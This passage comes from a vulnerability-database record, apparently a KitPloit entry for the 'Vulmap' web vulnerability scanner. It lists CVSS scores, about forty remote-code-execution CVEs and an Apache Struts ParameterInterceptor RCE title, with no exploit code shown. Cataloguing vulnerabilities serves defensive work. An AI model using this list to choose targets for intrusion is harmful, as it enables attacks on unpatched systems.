Scanning And Verification Tools", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738", "CVE-2010-1428", "CVE-2010-1870", "CVE-2011-3923", "CVE-2013-1966", "CVE-2013-2134", "CVE-2013-2251", "CVE-2014-4210", "CVE-2015-7501", "CVE-2016-3081", "CVE-2016-4437", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-12615", "CVE-2017-12629", "CVE-2017-3506", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-20062", "CVE-2018-2894", "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-0193", "CVE-2019-0230", "CVE-2019-17558", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-6340", "CVE-2019-7238", "CVE-2019-9082", "CVE-2020-10199", "CVE-2020-14882", "CVE-2020-1938", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2729", "CVE-2020-2883"], "modified": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Apache-Struts ParameterInterceptor &lt; 2.3.1.2 RCE Linux

Description

Related

Apache-Struts ParameterInterceptor < 2.3.1.2 RCE Linux